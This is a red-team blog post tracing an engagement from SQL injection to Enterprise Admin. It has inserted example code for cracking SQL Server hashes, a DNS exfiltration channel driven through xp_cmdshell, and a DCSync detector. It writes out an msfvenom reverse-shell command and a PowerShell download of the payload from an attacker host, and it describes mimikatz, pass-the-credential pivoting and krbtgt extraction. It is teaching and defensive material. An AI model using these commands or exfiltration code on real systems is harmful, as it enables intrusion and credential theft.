Anatomy of a Hack: SQLi to Enterprise Admin

We were recently engaged in a Red Team exercise in which the only information provided to us was the organisation name. In this blog post Sudhanshu Chauhan explores one of the exploitation paths which led us to achieve Windows Enterprise Admin level access starting from a SQL injection vulnerability. The story has the usual suspects: OSINT, weak credentials, password cracking, insecure configurations, pivoting, AV bypass and pure pwnage.
As active enumeration was prohibited during the initial phase, we started with passive information gathering, which included identifying IP ranges owned by the client, enumerating domains and subdomains, exploring GitHub, Pastebin and other sources for leaked sensitive information, and service discovery using Shodan as well as several other OSINT techniques.
A list of resources was compiled and ranked based on a number of factors, including leaked credentials, outdated software, exposed services etc., and from it we prioritised the targets that we believed would yield the most results. The list was then shared with the client and the targets for the next phase were confirmed.
One of the high-ranking websites was explored and a SQL injection vulnerability was identified. Using the '--is-dba' option in SQLMap, we identified that we had DB admin level privileges. Interactive access (sql-shell) was gained, from which multiple databases were identified. A number of database user accounts and the associated password hashes were also located. Using #OneRuleToRuleThemAll we were able to crack a number of those password hashes. Also, as 'xp_cmdshell' was enabled on the database server, we were able to execute OS commands. This was confirmed by out-of-band (OOB) DNS calls to our custom domain "xyz.abc.sos.notsosecure.com".
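The hash cracking step above, as an added example that is not code from the original post: a small rule-based cracker for SQL Server login hashes. The hash layout is the documented SQL Server 2012+ format (hashcat mode 1731): 0x0200, a 4-byte salt, then SHA-512 over the UTF-16LE password followed by the salt. The handful of rule functions in RULES stands in for the tens of thousands in OneRuleToRuleThemAll; the wordlist, logins, salts and hashes are constructed for the demo and are not from the engagement.

```python
"""Rule-based cracking of SQL Server password hashes, hashcat style.

Added example, not code from the original post. The hash layout is the
documented SQL Server 2012+ format (hashcat mode 1731): 0x0200, a 4-byte
salt, then SHA-512 over the UTF-16LE password followed by the salt. RULES is
a hand-picked handful of hashcat rule functions standing in for the tens of
thousands in OneRuleToRuleThemAll; the wordlist, logins, salts and hashes
below are constructed for the demo.
"""
from __future__ import annotations

import binascii
import hashlib


def mssql2012_hash(password: str, salt: bytes) -> str:
    """Return the 0x0200-prefixed hash as it appears in sys.sql_logins.password_hash."""
    if len(salt) != 4:
        raise ValueError("SQL Server salts are 4 bytes")
    digest = hashlib.sha512(password.encode("utf-16-le") + salt).digest()
    return "0x0200" + binascii.hexlify(salt + digest).decode().upper()


def parse_hash(h: str) -> tuple[bytes, bytes]:
    """Split a 0x0200 hash string into (salt, sha512 digest)."""
    raw = binascii.unhexlify(h[2:] if h.lower().startswith("0x") else h)
    if raw[:2] != b"\x02\x00" or len(raw) != 2 + 4 + 64:
        raise ValueError("not a SQL Server 2012+ hash")
    return raw[2:6], raw[6:]


def apply_rule(word: str, rule: str) -> str:
    """Apply one hashcat-style rule string to a word.

    Supported functions: ':' (no-op), 'l' lower, 'u' upper, 'c' capitalise,
    'r' reverse, 'd' duplicate, '$X' append X, '^X' prepend X. Spaces between
    functions are ignored, as in hashcat rule files.
    """
    out = word
    i = 0
    while i < len(rule):
        fn = rule[i]
        if fn in (":", " "):
            pass
        elif fn == "l":
            out = out.lower()
        elif fn == "u":
            out = out.upper()
        elif fn == "c":
            out = out[:1].upper() + out[1:].lower()
        elif fn == "r":
            out = out[::-1]
        elif fn == "d":
            out = out + out
        elif fn in ("$", "^"):
            i += 1
            if i >= len(rule):
                raise ValueError(f"rule {rule!r}: {fn} needs a character")
            out = out + rule[i] if fn == "$" else rule[i] + out
        else:
            raise ValueError(f"rule {rule!r}: unsupported function {fn!r}")
        i += 1
    return out


def crack(hashes: dict[str, str], wordlist: list[str], rules: list[str]) -> dict[str, str]:
    """Return {login: password} for every hash that a word+rule candidate reproduces.

    Every candidate has to be hashed once per target because each login
    carries its own salt; that is what makes these slower to attack in bulk
    than unsalted NTLM hashes.
    """
    targets = {login: parse_hash(h) for login, h in hashes.items()}
    found: dict[str, str] = {}
    for word in wordlist:
        for rule in rules:
            candidate = apply_rule(word, rule).encode("utf-16-le")
            for login, (salt, digest) in targets.items():
                if login not in found and hashlib.sha512(candidate + salt).digest() == digest:
                    found[login] = candidate.decode("utf-16-le")
    return found


WORDLIST = ["summer", "password", "welcome", "notsosecure"]
RULES = [":", "l", "u", "c", "c $1", "c $1 $2 $3", "c $2 $0 $1 $7", "$!", "r"]

# Constructed logins: three weak derivations of wordlist entries and one
# password this rule set cannot reach.
SAMPLE_HASHES = {
    "sa": mssql2012_hash("Summer2017", bytes.fromhex("a1b2c3d4")),
    "webapp": mssql2012_hash("Password1", bytes.fromhex("0badf00d")),
    "report_ro": mssql2012_hash("welcome!", bytes.fromhex("c0ffee00")),
    "dba_jsmith": mssql2012_hash("Tr0ub4dor&3", bytes.fromhex("deadbeef")),
}

if __name__ == "__main__":
    for login, pw in crack(SAMPLE_HASHES, WORDLIST, RULES).items():
        print(f"{login}: {pw}")
```

The point of the demo is the shape of the weakness rather than speed: three of the four constructed logins fall to a dictionary word plus a capitalisation and a year, a digit or a symbol, which is exactly the class of candidate a large rule file such as OneRuleToRuleThemAll generates. Any login whose password was later found reused on another host (as happened in this engagement) turns a database compromise into lateral movement.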
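The out-of-band DNS confirmation described above, as an added example that is not code from the original post: an encoder that turns command output into `nslookup` names under the receiving domain quoted above and the matching `xp_cmdshell` statements, plus a decoder that reassembles the data from the authoritative server's query log. The BIND-style log format used in the demo is constructed, not captured from a real resolver.

```python
"""Out-of-band DNS channel driven from xp_cmdshell: encoder and decoder.

Added example, not code from the original post. The receiving domain is the
one quoted in the post; the BIND-style query-log lines used in main() and the
tests are constructed, not captured from a real resolver.
"""
from __future__ import annotations

import binascii
import re

MAX_LABEL = 63    # RFC 1035 label limit
MAX_NAME = 253    # RFC 1035 limit on a full name in text form
CHUNK = 60        # hex chars per data label, leaving room for the sequence label
QUERY_RE = re.compile(r"query:\s+(\S+)")   # name field of a BIND-style query log line


def build_queries(data: bytes, domain: str) -> list[str]:
    """Split `data` into DNS names of the form <seq>.<hex>.<domain>.

    Hex keeps every label inside the hostname alphabet, and the sequence label
    lets the receiver reorder queries that arrive out of order or twice.
    """
    if not data:
        raise ValueError("nothing to encode")
    hexdata = binascii.hexlify(data).decode()
    names = []
    for seq, start in enumerate(range(0, len(hexdata), CHUNK)):
        name = f"{seq}.{hexdata[start:start + CHUNK]}.{domain}"
        if len(name) > MAX_NAME or any(len(label) > MAX_LABEL for label in name.split(".")):
            raise ValueError(f"name exceeds DNS limits: {name}")
        names.append(name)
    return names


def to_xp_cmdshell(name: str) -> str:
    """T-SQL that makes the database host resolve `name`.

    nslookup itself fails (no such record exists), but the query still reaches
    the authoritative server for the domain, which is all the confirmation needs.
    """
    return f"EXEC master..xp_cmdshell 'nslookup {name}';"


def decode_queries(log_lines: list[str], domain: str) -> bytes:
    """Reassemble the data from resolver log lines.

    Duplicate queries (resolver retries) collapse onto the same sequence
    number; a missing sequence number is reported rather than silently skipped.
    """
    suffix = "." + domain.lower()
    chunks: dict[int, str] = {}
    for line in log_lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        name = m.group(1).rstrip(".").lower()
        if not name.endswith(suffix):
            continue                      # lookup under some other zone
        labels = name[: -len(suffix)].split(".")
        if len(labels) != 2 or not labels[0].isdigit():
            continue                      # plain ping to the apex, or noise
        chunks[int(labels[0])] = labels[1]
    if not chunks:
        raise ValueError("no data queries in log")
    missing = sorted(set(range(max(chunks) + 1)) - chunks.keys())
    if missing:
        raise ValueError(f"missing sequence numbers: {missing}")
    return binascii.unhexlify("".join(chunks[i] for i in range(len(chunks))))


if __name__ == "__main__":
    DOMAIN = "xyz.abc.sos.notsosecure.com"
    # Constructed sample output (what `whoami` prints for the SQL Server service account).
    for name in build_queries(b"nt authority\\system", DOMAIN):
        print(to_xp_cmdshell(name))
```

The same channel explains why the confirmation worked even though no TCP connection back to the tester was possible: the database host only has to be able to resolve names through its normal recursive resolver, and the attacker's authoritative server sees the query. Defensively, a DNS log full of long hex labels under a domain no business system uses, coming from a database server, is the artefact to look for.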
Once you have code execution, the next step is to achieve better control via an interactive shell. We fiddled with multiple meterpreter payloads, but failed on nearly all of them. As we kept experimenting with multiple exfiltration techniques, such as ICMP tunnelling, we settled for an interactive ICMP shell through xp_cmdshell.
Using the newly gained ICMP shell we fiddled with the compromised system and looked around for anything that could help us during post-exploitation. The ICMP shell was also a little unstable, which wasn't good enough to quench our post-exploitation thirst.
As the host was a Windows box, we then tried to get a PowerShell meterpreter payload. It got us a shell, but it was detected within a few seconds and the connection was terminated. A little enumeration confirmed that there was enterprise security antivirus running on the host. After a few failed attempts to circumvent the protection in place, we stepped back to enumeration on the host and identified that Python was installed. We then generated a Python meterpreter payload using msfvenom by running the following command:
msfvenom -f raw -p python/meterpreter/reverse_tcp LHOST=<OUR_HOST> LPORT=1234 > pypreter.py
The above payload was then hosted on our server and we instructed the compromised server to download it using the following PowerShell command from the ICMP shell:
powershell $WebRequest = New-Object System.Net.WebClient; $WebRequest.DownloadFile('http://<OUR_HOST>:8000/pypreter.py','C:\Windows\Temp\pypreter.py')
We started our Metasploit multi/handler for the Python payload and executed the payload through the ICMP shell. Voila! This got us our much desired meterpreter shell.
Although much more stable than our initial ICMP shell, most of the meterpreter commands failed to fetch results. This was because of the limitations of the Python meterpreter implementation.
From our newly gained Python meterpreter shell we moved on to further enumeration. Based on our past experience we targeted network shares, as they are often not included within the antivirus scanning scope. Luckily, we stumbled across one such share and dropped a Windows non-staged meterpreter payload there. We started another Metasploit multi/handler for the non-staged meterpreter payload, executed the binary and, as expected, received a shiny new native meterpreter shell.
Once you have a meterpreter shell, the exciting times begin. We dumped hashes, tried to fetch clear text passwords using mimikatz and tried to extract delegation tokens, but we did not find anything which could help us get any further than we already were. No cleartext login credentials were found as no one was logged in, and the local hashes were not working anywhere else.
We identified that the host had multiple network interfaces, so we used our newly gained meterpreter session to add a route to the internal network using the following command:
route add 10.0.1.0 255.255.252.0 1
Once the route was added, we performed an ARP scan to identify live hosts on the network using a Metasploit post-exploitation module and identified multiple hosts.
Using an auxiliary Metasploit module we then executed a port scan against the live hosts to try to identify any hosts running MSSQL.
We then used the "auxiliary/scanner/mssql/mssql_login" module with the database accounts that were cracked earlier to see if any of them had been reused.
We found that one account was valid on two other hosts and had database admin privileges. With the help of the module 'auxiliary/admin/mssql/mssql_exec', we were able to use this privileged account to get a meterpreter shell running as SYSTEM. This host was running the Windows Server 2003 operating system (which is now obsolete). The local hashes were later dumped, and hashcat cracked a bunch of local accounts. The meterpreter shell was then used to dump domain account hashes.
Apart from that, mimikatz was also used to dump clear text passwords from the memory of the compromised box.
After further enumeration it was identified that one of these users was a member of the "Enterprise Admins" group. This gave us direct access to the Domain Controller. At this point we moved towards mass exploitation and, using these high privilege credentials, we extracted multiple clear text passwords from all other hosts using the PowerShell script "Invoke-MassMimikatz.ps1".
Additionally, we were now in a position to perform a hashdump on the domain controller to obtain the hashes of high privilege accounts like "krbtgt". Here we used a nifty command called 'dcsync_ntlm' from the Metasploit kiwi extension to extract the hash of the krbtgt account.
This hash can then be further leveraged to create a golden ticket and obtain persistence on the network. This is where we stopped after our long journey, starting from a web application vulnerability and ending with multiple credentials of enterprise admins.
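The DCSync step above is also the one a defender has the best chance of catching, so here is an added example, not code from the original post, of the corresponding detection logic. `dcsync_ntlm` works by asking a domain controller to replicate the krbtgt object; the DC records that request as Security event 4662 (with Directory Service Access auditing enabled) whose Properties field names the replication control-access rights. The three GUIDs below are the documented AD extended rights that replication requires; the event lines are a constructed, flattened key=value rendering of 4662, not the exact text Windows writes, and all account and host names are made up.

```python
"""Spotting DCSync-style replication requests in Domain Controller audit events.

Added example, not code from the original post. REPLICATION_RIGHTS holds the
documented AD extended-right GUIDs a DCSync needs; SAMPLE_EVENTS is a
constructed, pipe-separated flattening of Windows Security event 4662 (not
the exact text Windows writes) with made-up account and host names.
"""
from __future__ import annotations

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Non-DC accounts that legitimately request replication in this (constructed) environment,
# e.g. a directory synchronisation service account. Keep this list short and reviewed.
ALLOWLIST = frozenset({"svc_aadconnect"})

SAMPLE_EVENTS = [
    # DC-to-DC replication: normal.
    "EventID=4662 | Computer=DC01.corp.example | SubjectUserName=DC02$ | SubjectDomainName=CORP"
    " | AccessMask=0x100 | Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # Allow-listed sync account: normal.
    "EventID=4662 | Computer=DC01.corp.example | SubjectUserName=svc_aadconnect | SubjectDomainName=CORP"
    " | AccessMask=0x100 | Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # A user account pulling the full replication set: this is what dcsync_ntlm looks like.
    "EventID=4662 | Computer=DC01.corp.example | SubjectUserName=jsmith | SubjectDomainName=CORP"
    " | AccessMask=0x100 | Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    # Same user, unrelated object access (constructed placeholder GUID): not replication.
    "EventID=4662 | Computer=DC01.corp.example | SubjectUserName=jsmith | SubjectDomainName=CORP"
    " | AccessMask=0x10 | Properties={00000000-0000-0000-0000-000000000001}",
    # Different event type entirely.
    "EventID=4624 | Computer=DC01.corp.example | SubjectUserName=jsmith | LogonType=3",
]


def parse_event(line: str) -> dict[str, str]:
    """Turn one 'key=value | key=value' line into a dict (constructed format)."""
    fields: dict[str, str] = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def replication_guids(properties: str) -> list[str]:
    """Return the replication-right GUIDs present in a 4662 Properties field."""
    lowered = properties.lower()
    return [guid for guid in REPLICATION_RIGHTS if guid in lowered]


def detect_dcsync(lines: list[str], allowlist: frozenset[str] = ALLOWLIST) -> list[dict]:
    """Flag 4662 events where a non-DC, non-allow-listed account requested replication.

    Machine accounts (trailing '$') are skipped because DC-to-DC replication is
    the normal case; a stricter version would compare against the real list of
    DC computer accounts so that an attacker-controlled computer account is not
    waved through.
    """
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_guids(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        if user.endswith("$") or user.lower() in allowlist:
            continue
        alerts.append({
            "user": user,
            "domain": ev.get("SubjectDomainName", ""),
            "dc": ev.get("Computer", ""),
            "rights": [REPLICATION_RIGHTS[g] for g in rights],
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {alert['domain']}\\{alert['user']} on {alert['dc']}: {alert['rights']}")
```

The rule fires on the one event that matters here: a user account, rather than a domain controller, asking for DS-Replication-Get-Changes-All. It only works if Directory Service Access auditing is on and the domain object's SACL covers control access, so checking that those are in place is part of the detection, not an afterthought. Once krbtgt has been replicated out, the only real remediation is a double reset of the krbtgt password, because every golden ticket minted from the old hash stays valid until both old keys are gone.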
The entire scenario is demonstrated in the attack flow diagram below:
[Attack flow diagram: SQLi to Enterprise Admin]
This compromise life-cycle emphasises the fact that each individual vulnerability should be treated with importance, as we never know when it will become a link in a chain of vulnerabilities leading to full compromise. Another important aspect for an enterprise is to ensure that a complete inventory of all systems is created and that an acceptable patching and upgrading policy is in place.
Establishing domain persistence often requires several steps, involving both web application and infrastructure components, as shown above. Our Advanced Infrastructure Hacking (AIH) and Basic Web Hacking (BWH) courses, both of which are being delivered at Black Hat EU 2017, provide great insight into the identification of attack vectors like these and how to exploit them. Further details can be found below.